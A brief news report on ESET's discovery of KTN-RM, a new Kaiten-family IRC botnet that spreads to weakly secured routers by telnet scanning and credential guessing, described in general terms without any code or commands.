Malware targeting embedded devices such as routers rather than computers is doing the rounds.
A new and improved version of Kaiten, an Internet Relay Chat (IRC)-controlled malware typically used to carry out distributed denial-of-service (DDoS) attacks, is spreading, security firm ESET warns.
KTN-Remastered or KTN-RM features an improved spreading mechanism compared to its predecessor.
KTN-RM improves on that spreading mechanism by carrying downloader-executable binaries for embedded platforms such as routers and other connected devices, such as gateways and wireless access points.
The malware uses Linux/Gafgyt’s telnet scanning to hunt for routers before seeking to guess login credentials in order to commandeer weakly-secured routers and the like. If it successfully logs in, it will issue a shell command to download bot executable files for multiple architectures before running them on the compromised networking kit.
The Linux networking kit zombifying malware combines capabilities of two previous versions of bots, according to ESET, who have identified three variants of the new and improved strain thus far.
The malware also has a message for those who might try to neutralise its threat.
“Within the welcome message, version 2.0 seems to single out malwaremustdie.org which has published extensive details about Gafgyt, Tsunami and other members of this family of Malware,” explained Michal Malík, a malware researcher at ESET.
ESET’s blog post describing the malware in more detail can be found here. ®